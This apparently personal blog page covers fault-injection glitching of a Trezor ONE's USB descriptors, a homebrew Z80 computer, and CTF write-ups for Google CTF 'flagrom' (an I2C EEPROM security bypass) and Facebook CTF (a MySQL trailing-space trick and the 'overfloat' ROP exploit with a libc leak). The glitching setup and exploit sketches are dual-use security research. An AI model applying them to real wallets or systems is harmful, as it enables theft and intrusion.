USB Descriptor Glitching with Facedancer21

Over the past week, I have been making slow progress on glitching the USB descriptors of a Trezor ONE. I have built a framework for this and other USB-based glitching attacks, and will document the work here for future reference. As background reading, I advise that you review the following resources:

Overview

In a nutshell, this attack was performed using a ChipWhisperer back-end to insert a VCC glitch, a Facedancer to handle USB interfacing, and some Python scripting to tie it all together.

The Facedancer is a GoodFET core (well, an MSP430 microcontroller) tied to a MAX3421 front-end over an SPI bus, plus an FTDI UART IC for host communication. It was originally designed to interface arbitrarily with USB and has no support for glitch triggering, but it is easy to modify the MAXUSB app (goodfet/firmware/apps/usb/maxusb.c) to override any command so that it does what READ/WRITE does, but also pulls a pin high.

As an aside: the FTDI protocol is quite simple, and leads me to wonder why more pins are not broken out on the Facedancer for integration with other projects (and in this case, freeing a laptop USB port by driving the UART directly from the ChipWhisperer). I may add these in future.

Note that this isn’t perfect – there’s still significant horizontal jitter between when the MSP430 tells the MAX3421 to send a USB packet, and when vulnerable code executes on the target – but it’s better than nothing.

The final Facedancer modification looks like this:

You’ll note an extra GPIO pin is broken out (second from the right; the far right pin is the trigger). This drives a 2N7000 MOSFET, which resets the Trezor after every glitch insertion.

Finally, the Python driver code must be modified to support a variant form of USB transaction, where we simply call IN_Transfer continuously until it falls over or nothing is transmitted. This is described in scanlime’s glitching video, and is included in the source repository listed below.
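A minimal sketch of that loop follows. `in_transfer` is a hypothetical stand-in for the driver's IN transfer routine (the actual function in the modified Facedancer driver may be named and behave differently): here it is assumed to return one packet's bytes, or raise when the target stops responding.

```python
def drain_in_endpoint(in_transfer, max_packets=4096):
    """Repeatedly call in_transfer() until it raises or returns no data.

    in_transfer is a hypothetical stand-in for the driver's IN transfer routine:
    it should return the bytes of one packet, or raise if the target falls over.
    Returns (all bytes collected, reason the loop stopped).
    """
    collected = bytearray()
    for _ in range(max_packets):
        try:
            packet = in_transfer()
        except Exception as exc:  # timeout, STALL, device reset, ...
            return bytes(collected), f"error: {exc!r}"
        if not packet:
            return bytes(collected), "empty"  # nothing transmitted
        collected += packet
    return bytes(collected), "limit"  # safety cap reached
```

Presumably a successful glitch shows up as more data than the descriptor should contain; the `max_packets` cap just keeps a wedged target from looping forever.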

Timing

One of the most significant challenges in this exercise was timing the glitch correctly. To an extent, this is impossible: due to natural jitter on both ends of the USB pipe, no glitch can be timed both precisely and reliably. Instead, my goal was to land the glitch in the right ballpark. This is compounded by the ChipWhisperer’s clock not being synchronised with the target’s internal PLL.

This is ultimately a small problem that can be solved with some logic analyzer time:

Of course, the actual parameters used will be different for you, depending on your clock generator configuration and USB sender setup.
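The arithmetic behind turning a logic analyzer measurement into glitch parameters can be sketched as follows. This assumes the glitch offset is counted in cycles of the ChipWhisperer's clock, and that you have measured a median trigger-to-target delay and its spread; the function name and example figures are illustrative only.

```python
import math


def offset_window(delay_us: float, jitter_us: float, clk_hz: float) -> range:
    """Convert a trigger-to-target delay (measured on a logic analyzer) into a
    range of glitch offsets, in glitch-clock cycles, that covers the jitter.

    delay_us  - median delay from the trigger pin rising to the code of interest
    jitter_us - observed peak-to-peak spread of that delay
    clk_hz    - frequency of the clock the glitch offset is counted in
    """
    cycles_per_us = clk_hz / 1e6
    start = math.floor((delay_us - jitter_us / 2) * cycles_per_us)
    stop = math.ceil((delay_us + jitter_us / 2) * cycles_per_us)
    return range(max(start, 0), stop + 1)  # inclusive of the last cycle
```

For example, a 50 µs delay with 4 µs of spread at a 10 MHz clock gives offsets 480 to 520. Sweeping the whole window, rather than a single offset, is one way to live with the jitter described above.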

Using a logic analyzer, I could also see when my glitches caused the device to reset or enter an unrecoverable error state, which helped me refine the size of my inserted glitches.

Note that it is also possible to glitch the output instead (at the other end, when a USB IN transfer occurs), but in my opinion this is less likely to affect the integrity of the USB packet itself. Just thinking logically, how would you implement it with a discrete USB controller? Buffering the packet and waiting for the host to give you bandwidth is the only sane way to do it.

Target Preparation

Some work also needed to be done on the target, to prepare it for VCC glitching. Primarily, the decoupling capacitors need to be removed. If you are reading the datasheets for this, be careful that you count all the capacitors (including the VBAT ones) – these aren’t all located in one place on the official Trezor schematic.

An additional 2N7000 is used to allow the Facedancer to conveniently reset the device without power cycling the USB.

A power cleaning net is used to provide a relatively stable source of 3.3v power to the CPU: a pair of capacitors is used to clean the power supply (not perfect, but fuck knows it’s better than USB straight through a 3.3v regulator), and a small resistor (10 Ohms) is used to isolate the switching noise of the CPU so we’re better able to analyze our work with an oscilloscope.

Project Control

Finally, a Python script is used to tie together the ChipWhisperer and the Facedancer. This is similar to my other glitching experiments, and a copy of the code can be found on my GitHub. At the time of writing, it is not integrated with my graphing / project review utilities; I’ll add this as time permits.

Note that you must build and update the Facedancer’s firmware if you want to use this: the Python scripts make use of new commands which are not implemented by default.

Alternatively, Kate Temkin’s work might also be useful, particularly if you are using an alternative back-end to the MAX3421.

And with this, we sit back and wait for the glitches to appear:

Posted in Bards, Computers, Jesting | Leave a comment

The Z80 Adventure Part II

Today, I was able to use the Z80 I built last week to boot Grant Searle’s Z80 BASIC ROM without modifications, with access to both banks of SRAM. You can download this ROM file here.

Several core pieces of functionality had to be implemented to enable full operation, which will be described here.

“UART” from Z80

If you have been reviewing datasheets, you will note that, unlike modern microcontrollers, the Z80 has no hardware serial RX/TX. Instead, this function can be implemented in myriad ways, depending on agreement between the BIOS (a handful of interrupt vectors counts, right?) and the system designer: anything from memory-mapped IO to in/out on special ports is OK.

In this case, as I wanted to run Grant Searle’s BASIC ROM, my implementation had to be compatible with what the ROM was expecting. The ROM performs IO using IOREQ accesses to ports 0x80 (Control) and 0x81 (Data), both of which are implemented by the ATMega.

Truth be told, I didn’t understand the control register implementation, but I didn’t need to: the BASIC ROM only used this register to check for readiness to send and receive, so I faked it with fixed values, which was good enough to support the minimal requirement of allowing the Z80 to send and receive characters.
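For illustration, here is a Python model of the port handling the AVR performs. It assumes the ROM follows the Motorola 6850 ACIA convention that Searle's design is built around (status bit 0 = receive data register full, bit 1 = transmit data register empty); the class and method names are hypothetical. Unlike the fully fixed values described above, this variant only reports "byte available" when one is actually queued.

```python
from collections import deque

# Assumed 6850-style status bits (port 0x80); port 0x81 carries data.
STATUS_RDRF = 0x01  # receive data register full: a byte is waiting
STATUS_TDRE = 0x02  # transmit data register empty: ready to send


class FakeUart:
    """Hypothetical model of the AVR serving the Z80's IO ports 0x80/0x81."""

    def __init__(self):
        self.rx = deque()  # bytes from the host, waiting for the Z80
        self.tx = []       # bytes the Z80 has sent

    def io_read(self, port):
        if port == 0x80:
            # Always ready to send; "byte available" only when one is queued.
            return STATUS_TDRE | (STATUS_RDRF if self.rx else 0)
        if port == 0x81:
            return self.rx.popleft() if self.rx else 0x00
        return 0xFF  # unmapped port

    def io_write(self, port, value):
        if port == 0x81:
            self.tx.append(value & 0xFF)
        # Writes to 0x80 (baud rate, RTS, IRQ enable) are accepted and ignored.
```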

This leads us to our next problem…

Interrupts

Send and receive functionality is enough for an extremely primitive terminal, but is not enough for the BASIC console to work. The interrupt stub for the BASIC ROM reveals why:

In truth, incoming characters were handled by the routine at 0x38, the restart vector the Z80 jumps to on a maskable interrupt in interrupt mode 1 (no equivalent poll loops were present in BASIC.ASM).

I handled this by first converting the AVR’s UART to generate interrupts. This can be done by:

  • Setting the RXCIE bit in the UART control register
  • At build/flash-time, registering the UART Receive Complete interrupt vector
  • After enabling the hardware UART at runtime, enabling global interrupts with sei()

This done, I then modified the interrupt handler to buffer the received character and set a global “interrupt pending” flag, so that the interrupt line could be asserted low at the next available clock cycle. There is a bit of trickery here: as the Z80 does not execute one instruction per cycle (it only samples the interrupt line at the end of each instruction), we must hold the interrupt line low until the interrupt is acknowledged, which the Z80 signals by driving IOREQ and M1 low together, as per the following diagram:

To do this, I carved out another line from the AVR-Z80 address bus for M1 (remember: we need to pull each “unmanaged” address line to 0 so it doesn’t fragment our memory accesses). I wrote some handler code to assert an interrupt until it is acknowledged, then insert a fake clock cycle to return an interrupt vector, in case I want to use Mode 2 interrupts in future.
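The interrupt handshake above can be modelled as a small state machine. This is a Python sketch, not the original AVR code: the class and method names are hypothetical, signals are active low (0 = asserted), and the vector byte only matters if the Z80 is in interrupt mode 2.

```python
class InterruptLine:
    """Hypothetical model of the AVR driving the Z80's active-low /INT pin."""

    def __init__(self, vector=0xFF):
        self.pending = False
        self.vector = vector  # byte driven onto the data bus during acknowledge (Mode 2 only)
        self.int_n = 1        # /INT level: 1 = released, 0 = asserted

    def on_uart_rx(self):
        # Called from the (modelled) UART receive ISR: latch the request.
        self.pending = True

    def on_clock(self, m1_n, iorq_n):
        """Call once per forged Z80 clock with the sampled /M1 and /IORQ levels.

        Returns the byte to place on the data bus, or None to leave it alone.
        """
        if self.pending and m1_n == 0 and iorq_n == 0:
            # Interrupt acknowledge: /M1 and /IORQ are low together.
            self.pending = False
            self.int_n = 1
            return self.vector
        # Keep /INT asserted until the Z80 gets around to acknowledging it.
        self.int_n = 0 if self.pending else 1
        return None
```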

By this point, I had enough for the BASIC interpreter to function, which leads us to our next problem…

SRAM / Bus Width

The BASIC ROM (interrupt stub + BASIC interpreter) was all of 8KB. With the AVR’s share of the address bus now shrunk even further, it simply could not write 8KB to memory by itself, and I did not want to forcibly assert control of the WR/RD lines while the Z80 was held in reset.

Instead, I used a small bootloader from the PSoC project, here. I modified it slightly to complete more quickly (as I only needed 0x2000 bytes, not 0x4000), and hard-coded it into the AVR program.

I then implemented a fake IO port at 0xFF, as the original author did, to serve up the BASIC ROM. Unfortunately, the BASIC ROM was too large to fit into the AVR’s SRAM, so I modified the code further to place both the bootloader and the BASIC ROM in program memory, carefully refactoring code as necessary to support the change.
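The port-based loading scheme boils down to a counter behind a port. The sketch below models both sides in Python. The class and function names, and the choice to return zeros once the image is exhausted, are assumptions for illustration.

```python
class RomPort:
    """Hypothetical model of a fake IO port at 0xFF that streams a ROM image."""

    PORT = 0xFF

    def __init__(self, image: bytes):
        self.image = image
        self.pos = 0

    def io_read(self, port: int) -> int:
        if port != self.PORT:
            return 0xFF  # not our port
        if self.pos >= len(self.image):
            return 0x00  # past the end of the image: pad with zeros (an assumption)
        value = self.image[self.pos]
        self.pos += 1  # each IN from the port returns the next byte
        return value


def bootload(port: RomPort, length: int = 0x2000) -> bytearray:
    """Model of the Z80-side loop: read `length` bytes from port 0xFF into RAM."""
    ram = bytearray(length)
    for addr in range(length):
        ram[addr] = port.io_read(RomPort.PORT)
    return ram
```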

With all this done, BASIC successfully launches:

As an added bonus, the memory-selftest function indicates that both banks of SRAM are recognized by the Z80, and accessible to the user transparently. Hooray!


Just for Fun: The Z80 Adventure!

Earlier this week, I realized that I have a single piece of full-size prototyping board left. In a fit of madness, I decided that the best course of action was to build a small Z80 computer on it.

The Zilog Z80 is a CPU from the 1970s, powering venerable machines such as the TRS-80 and Sinclair ZX Spectrum (i.e. before computers were just machines to be dickheads to each other remotely).

I began by reading over the work of others, to get an idea of how I might build a simple computer. Some of the projects I found and reviewed were:

I particularly enjoyed the final project, which made use of a PSoC 5 development kit. I think the PSoC line is very flexible, and perhaps doesn’t see enough use in hobbyist projects, if only due to its obscure ecosystem compared to AVR/PIC.

Unlike modern microcontrollers, the Z80 does not include on-board ROM: instead, when it comes out of reset it begins fetching instructions from address 0, and will run whatever code is provided to it. Therefore, instead of “programming” a Z80 as you would an AVR, you program EEPROMs and have the Z80 load them.

Incidentally, this is how game cartridges worked: by exposing the CPU’s address and data lines (and by extension, the system’s address and data buses), a set of EEPROMs could feed additional data to the system. Alternatively, a microcontroller inside the cartridge could assert control of the bus and run code entirely independently. It is my great misfortune that my project was done on a limited-space prototyping board, and I could not expose an expansion header that provided power and bus access.

Design-wise, I settled on a hybrid design, using an ATMega32A as a bootloader, two 32KB blocks of static RAM, and some logic ICs. The AVR would boot first, filling the SRAM with code while holding the Z80’s reset low. The AVR would then relinquish control of the address and data buses, provide a clock signal and reset the Z80, allowing the machine to boot. Some virtual logic analyzer code within the AVR then allows us to inspect the Z80’s buses and, if need be, play the part of a hardware debugger.

I began by constructing a test circuit, based on this. To confirm signs of life, I wired up the ATMega32A to feed a slow 5Hz clock signal to the Z80, with the data bus pulled down to 0 (i.e. a stream of NOPs), and LEDs on the address lines. You can see this working here:

At this point, I decided my next task was to build some code to program the SRAM chips. While a traditional Z80 would use an EEPROM (containing CP/M, BASIC or what have you), it is fine to use an SRAM chip for this instead, as long as you load it with data before the Z80 comes out of reset. Programming a parallel SRAM was much simpler than I thought, and was simply a matter of setting the address and data buses and pulsing chip enable and write enable.
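That write sequence can be sketched as below. The bus object and its `set_address`, `set_data` and `set_pin` methods are hypothetical stand-ins for the AVR port writes, and `FakeSramBus` is a simple simulated SRAM (latching on the rising edge of /WE while /CE is low) so the sequence can be exercised without hardware.

```python
class SramProgrammer:
    """Hypothetical model of the AVR writing a parallel SRAM byte by byte."""

    def __init__(self, bus):
        self.bus = bus

    def write_byte(self, addr, value):
        self.bus.set_address(addr)
        self.bus.set_data(value)
        # /CE and /WE are active low: assert both, then release /WE to latch the byte.
        self.bus.set_pin("CE", 0)
        self.bus.set_pin("WE", 0)
        self.bus.set_pin("WE", 1)
        self.bus.set_pin("CE", 1)

    def write_block(self, start, data):
        for offset, value in enumerate(data):
            self.write_byte(start + offset, value)


class FakeSramBus:
    """Simulated 32KB SRAM: latches data when /WE rises while /CE is low."""

    def __init__(self, size=0x8000):
        self.mem = bytearray(size)
        self.addr = 0
        self.data = 0
        self.pins = {"CE": 1, "WE": 1}

    def set_address(self, addr):
        self.addr = addr & 0x7FFF  # 15 address lines

    def set_data(self, value):
        self.data = value & 0xFF

    def set_pin(self, name, level):
        rising_we = name == "WE" and self.pins["WE"] == 0 and level == 1
        if rising_we and self.pins["CE"] == 0:
            self.mem[self.addr] = self.data
        self.pins[name] = level
```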

With the SRAMs programmed, I moved on to wiring up the Z80. The Z80 CPU has a 16-bit address bus, so I used a hex inverter and a 74-series OR gate to build an SRAM bank selector driven by chip enable and the highest bit of the address bus (pulled down, as we never asserted this from the AVR). The rest of the pins were wired up to the AVR, with some quirks:

  • The WAIT pin is pulled up on the Z80 side and wired to an input on the AVR. Since we control the clock, we can simply stretch it when a delay is needed.
  • I couldn’t get the Z80 to fully relinquish the bus control lines (i.e. tri-state everything) using BUSREQ, so I put current-limiting resistors between WR/RD and the corresponding pins on the AVR. This only matters during bootloading; let me know if you’ve got a reliable way to fix this.
  • Strong pull-down resistors were used on the upper bits of the Z80’s address bus: these needed to be 0 during the bootloader process, as they’re address inputs on the SRAM chips, but otherwise the Z80 could have control.
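The bank selector described above can be expressed as a truth table. This sketch assumes the chip-enable input is the Z80's active-low /MREQ and that each SRAM's active-low /CE comes from one OR gate, with the inverter providing NOT A15 for the upper bank; the exact wiring on the board may differ.

```python
def bank_select(mreq_n: int, a15: int) -> tuple[int, int]:
    """Return (/CE0, /CE1) for the two 32KB SRAMs; all signals active low.

    Assumed wiring: /CE0 = /MREQ OR A15, /CE1 = /MREQ OR NOT A15.
    """
    not_a15 = a15 ^ 1           # hex inverter section
    ce0_n = mreq_n | a15        # low only for a memory request with A15 = 0
    ce1_n = mreq_n | not_a15    # low only for a memory request with A15 = 1
    return ce0_n, ce1_n


def decode(address: int, mreq_n: int = 0):
    """Map a 16-bit Z80 address to (chip, offset), or None if no chip is selected."""
    a15 = (address >> 15) & 1
    ce0_n, ce1_n = bank_select(mreq_n, a15)
    if ce0_n == 0:
        return 0, address & 0x7FFF
    if ce1_n == 0:
        return 1, address & 0x7FFF
    return None
```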

The completed work looked somewhat OK:

Note the additional resistors to the right of the hex inverter at the top right: I had managed to purchase an open-drain version when I went to Jaycar, and the cost of this oversight was 5 pull-up resistors.

The back-side can be accurately represented by the bowl of noodles emoji.

Some quick test code later, and the Z80 was able to load and execute a test loop, reading code from memory and correctly performing math and control transfer operations.

The final hurdle was to correctly implement IO instructions. According to the datasheet, the Z80’s IO uses an 8-bit port address on the address bus plus the 8-bit data bus (that is: memory can be 64KB, but only 256 IO ports exist), along with a dedicated IOREQ control pin. OUT instructions were no problem, as all the AVR’s bus pins could remain inputs, but IN instructions required flipping the bus direction and some careful timing:

As you can see by reviewing the slightly diagonal datasheet that’s just images so you can’t search (and which definitely isn’t a troll from Zilog), there is some delay between the assertion of IOREQ / RD and the moment the CPU samples the data bus. I found I could reliably meet this timing by forging a single clock cycle (after which IOREQ / RD are no longer asserted low), which I did, and confirmed with some simple test code:
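The IN handling can be sketched as follows, modelling the AVR as it samples the bus with the Z80 clock stopped. The handler table, the `tick` callback (standing in for forging one clock pulse) and the method names are hypothetical; /M1 is checked so that an interrupt acknowledge, which also drives /IORQ low, is not mistaken for an IO read.

```python
class IoBridge:
    """Hypothetical model of the AVR servicing Z80 IO cycles while it holds the clock.

    handlers maps an 8-bit port number to (read_fn, write_fn).
    """

    def __init__(self, handlers):
        self.handlers = handlers
        self.data_dir = "in"  # AVR data-bus pins idle as inputs

    def service(self, address, data_bus, iorq_n, rd_n, wr_n, m1_n, tick):
        """Inspect the sampled bus lines (active-low signals as 0/1 ints)."""
        if iorq_n or not m1_n:
            return None  # not an IO cycle, or an interrupt acknowledge (/M1 low)
        port = address & 0xFF  # A0-A7 select one of 256 ports
        read_fn, write_fn = self.handlers.get(port, (lambda: 0xFF, lambda value: None))
        if not wr_n:
            write_fn(data_bus)  # OUT: sample the bus; pins stay inputs
            return None
        if not rd_n:
            value = read_fn() & 0xFF
            self.data_dir = "out"  # IN: turn the bus around and drive the byte
            tick()                 # forge one clock so the Z80 latches the byte
            self.data_dir = "in"   # /IORQ and /RD are released; stop driving
            return value
        return None
```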

To me, this marks the completion of building a core Z80 system. Everything else is simply implementing peripheral support: with the CPU working and having a line of communication to the outside world, the AVR here can play the role of “hardware gatekeeper”, bridging peripheral IO requests to appropriate peripherals or, in its simplest mode, simply relaying serial output.

Thank you to everyone who attempted similar projects before me: I would not have been able to complete this project so quickly without standing on the shoulders of giants. You can find my code here, along with a collection of datasheets and saved reference material so you don’t need to visit HTTP sites from the age of Geocities. I hope this proves useful to someone else.


Writeup – flagrom (Google CTF)

This weekend, I participated in Google CTF 2019. I was able to solve one challenge during the time allocated, and the writeup is below.

Flagrom

Many thanks to netcat for a nudge in the right direction for this challenge.

This challenge was presented as an archive containing source code and a binary, which you can download here. The challenge flavor text indicated a flag was in a secure EEPROM, and it was our task to fetch it.

A target server and port were also provided. On connecting to this host, I was greeted with a proof of work challenge:

I then wrote a (pretty crap) MD5 brute forcer, and patched out the same check in the flagrom binary:
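A brute forcer of this kind is only a few lines of Python. The challenge format assumed here (a fixed string prefix, plus a required prefix on the MD5 hex digest) is a guess at a common proof-of-work shape, and `solve_pow` is a hypothetical name; adjust both to the actual prompt.

```python
import hashlib
import itertools
import string


def solve_pow(prefix: str, digest_prefix: str,
              alphabet: str = string.ascii_letters + string.digits) -> str:
    """Find prefix + suffix whose MD5 hex digest starts with digest_prefix.

    Tries printable suffixes in order of increasing length (1, 2, 3, ...).
    """
    for length in itertools.count(1):
        for combo in itertools.product(alphabet, repeat=length):
            candidate = prefix + "".join(combo)
            if hashlib.md5(candidate.encode()).hexdigest().startswith(digest_prefix):
                return candidate
```

Each extra hex digit required multiplies the expected work by 16, so a short digest prefix is solved almost instantly.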

With a little further investigation, the flagrom binary appears to be a Verilator executable (seeprom.sv, referred to as “the seeprom” from here) glued onto an 8051 emulator. The binary would instantiate the seeprom, run firmware.8051 and then run 8051 code which we supplied. The supplied payload needed to be an 8051 ELF file, as confirmed by feeding the program the supplied firmware.8051 as a payload.

At this point, it’s worth mentioning that I wasted a significant amount of time attempting to gain code execution by manipulating the provided ELF file (i.e. manually moving instructions around), which is my typical approach when confronted with strange architectures. It wasn’t until a while later that I realized sdcc, the Small Device C Compiler, could generate working ELF binaries.

We then turn to investigating the provided 8051 firmware, and the seeprom itself. The 8051 code is a wrapper which manipulates a seeprom – it writes a flag to the seeprom via an I2C command (and verifies it after with a second I2C command), “secures” the flag and then writes a test message in an unsecured portion of the seeprom.

The seeprom itself supports 2 I2C commands:

  • I2C_CONTROL_EEPROM, accessible at addresses starting with 0b1010
  • I2C_CONTROL_SECURE, accessible at addresses starting with 0b0101

Initially, I thought I could get an easy win by simply unsetting the security flag, but the I2C_CONTROL_SECURE function appears to be implemented securely, with only the ability to secure more sectors, not arbitrarily remove the security flag:

Our goal is to read out a flag, so we investigate the… control flow (does control flow apply to Verilog?). In order to read a section we must meet the following conditions:

  • At the start of the read command, i2c_address_valid must be true
    • This is only set when an address is loaded
    • This is unset at the end of each command (indicated by i2c_stop)
  • At the end of each byte read, i2c_address_secure == i2c_next_address_secure must be true
    • These are wired (combinational) signals, so there’s not really any “set” or “unset” action here.

Unfortunately, none of the I2C helper functions in the provided firmware.c file seemed to allow skipping of the i2c_stop command, but helpfully, the SCL and SDA wires were directly broken out to the 8051 user code – so the solution was to bit-bang I2C.

Not wanting to write I2C bit-bang functions myself, I searched for how to interface 8051 to an EEPROM, and lo and behold, I found this. I stole the bit-bang wrapper functions, and wrote some test harnesses, indicating successful basic control of read and write.
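To illustrate what bit-banging buys us here, the sketch below generates (SCL, SDA) level sequences for START, STOP and byte writes, and decodes them again. It is a pure-Python model, not the borrowed 8051 wrapper functions.

```python
def i2c_start():
    """START (or repeated START): SDA falls while SCL is high."""
    return [(0, 1), (1, 1), (1, 0), (0, 0)]  # (SCL, SDA) steps


def i2c_stop():
    """STOP: SDA rises while SCL is high."""
    return [(0, 0), (1, 0), (1, 1)]


def i2c_write_byte(value):
    """Clock out 8 bits MSB first, then release SDA for the ACK clock."""
    wave = []
    for bit in range(7, -1, -1):
        level = (value >> bit) & 1
        wave += [(0, level), (1, level), (0, level)]  # SDA only changes while SCL is low
    wave += [(0, 1), (1, 1), (0, 1)]  # ACK slot: a real slave would pull SDA low here
    return wave


def decode(wave):
    """Turn a (SCL, SDA) trace back into 'S', 'P' and sampled bits."""
    tokens = []
    prev_scl, prev_sda = 1, 1  # idle bus
    rose = False  # did SCL rise on the previous step?
    for scl, sda in wave:
        if prev_scl == 1 and scl == 1 and sda != prev_sda:
            if rose:
                tokens.pop()  # that rising edge was set-up for START/STOP, not data
            tokens.append("S" if sda == 0 else "P")
            rose = False
        elif prev_scl == 0 and scl == 1:
            tokens.append(sda)  # receivers sample SDA on the rising edge of SCL
            rose = True
        else:
            rose = False
        prev_scl, prev_sda = scl, sda
    return tokens
```

For example, `decode(i2c_start() + i2c_write_byte(0xA0) + i2c_start() + i2c_write_byte(0x51) + i2c_stop())` contains a repeated START in the middle and only one STOP at the very end: exactly the kind of stop-free chaining the firmware's helper functions don't allow. The byte values are arbitrary, not the seeprom's real command bytes.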

The final trick lay in the timing of the I2C commands: we’re not able to “unmark” page security flags, so in order to ensure i2c_address_secure == i2c_next_address_secure (and not get caught at the page 1 boundary), we need to construct a single I2C transaction which:

  • Loads an address before 0x64 (setting i2c_address_valid)
  • Sets all the pages to secure (ensuring i2c_address_secure == i2c_next_address_secure)
  • Reads from the already loaded address, without loading further addresses.
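The three steps above can be checked against a toy model of the read gating. The 64-byte page size, the flag's location, and the rule that loading an address in a secure page leaves `i2c_address_valid` unset are all assumptions made for illustration, not a transcription of seeprom.sv.

```python
PAGE_SIZE = 64  # assumption: 256 bytes split into four 64-byte pages


class SeepromModel:
    """Toy model of the seeprom read gating (not seeprom.sv itself).

    Assumption: loading an address only sets address_valid when that address is in
    an unsecured page; security bits can be added but never cleared.
    """

    def __init__(self, memory, secure_mask):
        self.mem = bytes(memory)
        self.secure_mask = secure_mask  # bit n set => page n is secure
        self.address = 0
        self.address_valid = False

    def _is_secure(self, addr):
        page = (addr % len(self.mem)) // PAGE_SIZE
        return bool((self.secure_mask >> page) & 1)

    def load_address(self, addr):
        self.address = addr
        self.address_valid = not self._is_secure(addr)

    def secure(self, mask):
        self.secure_mask |= mask  # like I2C_CONTROL_SECURE: only ever adds

    def stop(self):
        self.address_valid = False  # i2c_stop ends the command

    def read(self, count):
        out = []
        if not self.address_valid:
            return out
        for _ in range(count):
            out.append(self.mem[self.address % len(self.mem)])
            nxt = self.address + 1
            if self._is_secure(self.address) != self._is_secure(nxt):
                break  # i2c_address_secure != i2c_next_address_secure: abort
            self.address = nxt
        return out
```

In the model, a naive read of the secure page returns nothing and a read from page 0 stops at the page boundary, while load, secure everything, then read (with no stop in between) walks straight through the flag.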

A little code finesse later, and the flag is revealed:

You can download the completed exploit code here.

Thank you to Google for hosting this event: this has given me an opportunity to begin rebuilding a community of like-minded CTF players, and I continue to learn a lot from the challenges I didn’t attempt to solve.


Writeups – products-manager, overfloat (Facebook CTF)

This weekend, I participated in the Facebook CTF event. The quality of challenges in this CTF was decent, but the event was marred by connectivity problems which left it unplayable for me for a significant portion of the time.

I solved two challenges during this event; as always, the writeups are below.

Products Manager

This challenge was presented as a web challenge, with corresponding source code, which you can download here.

We can identify the core of the challenge by reviewing db.php:

Inspection of the source code shows that there is surprisingly limited attack surface, and that all SQL queries are sensibly parameterised. A poor choice of setup in the CTF gave the solution away: I noticed that at one point, two “facebook” entries were present in the “top 5” list.

This indicated that it was possible to both add another entry called “facebook” (or close to it), and that the web application was a shared, stateful application – an interesting choice for the expected player turnout.

A bit of fiddling later, and I was able to add “facebook” with an encoded space (“+”) at the end:

Following this, I could extract the flag by correctly supplying the secret that I knew.

Presumably this is an edge case in how MySQL compares strings with trailing spaces (under PAD SPACE collations, trailing spaces are ignored in comparisons, so “facebook ” matches “facebook”): a useful trick for later, but 100 points for now.
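Both halves of the trick can be shown in a few lines of Python. `pad_space_equal` is a deliberately simplified model of a MySQL PAD SPACE comparison (it ignores case folding and other collation rules), not MySQL itself.

```python
from urllib.parse import unquote_plus


def pad_space_equal(a: str, b: str) -> bool:
    """Simplified PAD SPACE equality: trailing spaces do not affect the result."""
    return a.rstrip(" ") == b.rstrip(" ")


submitted = unquote_plus("facebook+")  # form-encoded "+" decodes to a space
```

The application sees `"facebook "` as a distinct string, while a PAD SPACE comparison in the database treats it as equal to `"facebook"`.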

Overfloat

This challenge was presented as a pwnable challenge. The pwn binary can be downloaded here, along with the corresponding libc.

Upon initial analysis, this application performed some floating point maths:

I did some local debugging with gdb, comparing inputs and outputs, but got nowhere until I used retdec to decompile the binary. You can download the decompiled source here.

This made the program logic much clearer, and immediately revealed the structure as a “ROP builder” challenge: the program effectively lets the user enter ROP gadget addresses at will, encoded as floats, and then triggers a stack-based overflow. To get past the first hurdle, I created a simple C program which did the appropriate float conversion. You can download this here.
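A Python equivalent of that conversion is sketched below, in place of the original C program. It assumes each float occupies 4 bytes of the stack buffer, so a 64-bit gadget address is entered as two floats, low half first, and that the binary parses each decimal value back into a 32-bit float. Words whose bit pattern happens to be a NaN may not survive the text round trip.

```python
import struct


def addr_to_floats(addr):
    """Split a 64-bit value into the two 32-bit floats whose bytes encode it (little-endian)."""
    low, high = struct.unpack("<ff", struct.pack("<Q", addr))
    return low, high


def floats_to_addr(low, high):
    """Inverse of addr_to_floats, handy for checking an encoding."""
    return struct.unpack("<Q", struct.pack("<ff", low, high))[0]


def floats_as_text(addr):
    """Text to type at the prompt; repr() round-trips each value exactly."""
    return [repr(f) for f in addr_to_floats(addr)]
```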

We can quickly confirm that we control execution via the overwritten stack:

From here, traditional wisdom (and the fact that we have libc) indicates that we should leak an offset within libc, reset execution, then re-exploit the overflow to call a magic gadget (or system-equivalent point) to get a shell.

The leak was trivial to accomplish by loading RDI and then calling puts at 0x400690. Program execution is then reset to 0x400749, and the exploit is re-fired against a known target. Note that RBP is fucked at this point thanks to the leave instruction, and the remote target behaved differently to my local machine, resulting in a frustrating period of yes/no debugging via printf ROP chain links, but flags are flags.
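The two-stage structure can be sketched like this. Only 0x400690 and 0x400749 come from the writeup; the gadget, GOT and libc offset values are hypothetical placeholders, the padding up to the saved return address is omitted, and each qword would still need to be entered as a pair of floats.

```python
import struct

# From the writeup: puts is called via 0x400690, execution restarts at 0x400749.
PUTS_CALL = 0x400690
RESTART = 0x400749

# Hypothetical placeholders: look these up in your own copy of the binary and libc.
POP_RDI = 0x400A83           # "pop rdi; ret" gadget (placeholder)
PUTS_GOT = 0x602020          # GOT entry for puts (placeholder)
PUTS_LIBC_OFFSET = 0x809C0   # offset of puts inside the supplied libc (placeholder)


def stage1_chain():
    """First chain: puts(PUTS_GOT) leaks a libc pointer, then jump back to RESTART."""
    return [POP_RDI, PUTS_GOT, PUTS_CALL, RESTART]


def libc_base(line: bytes) -> int:
    """Turn the line printed by puts() into the libc base address.

    puts() stops at the first NUL byte and appends a newline, so strip exactly one
    trailing newline and pad the little-endian pointer back out to 8 bytes.
    """
    if line.endswith(b"\n"):
        line = line[:-1]
    leaked = struct.unpack("<Q", line.ljust(8, b"\x00"))[0]
    return leaked - PUTS_LIBC_OFFSET


def stage2_chain(base: int, gadget_offset: int):
    """Second chain: return into a magic gadget (or system-equivalent point) in libc."""
    return [base + gadget_offset]
```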

You can download the complete exploit here.

Thanks to the organisers and challenge creators of this CTF – this was a good exercise for someone who hasn’t CTF’ed for quite some time, and a steady reminder that no matter the strengths of one’s motivations, only results matter. See you in the next CTF.
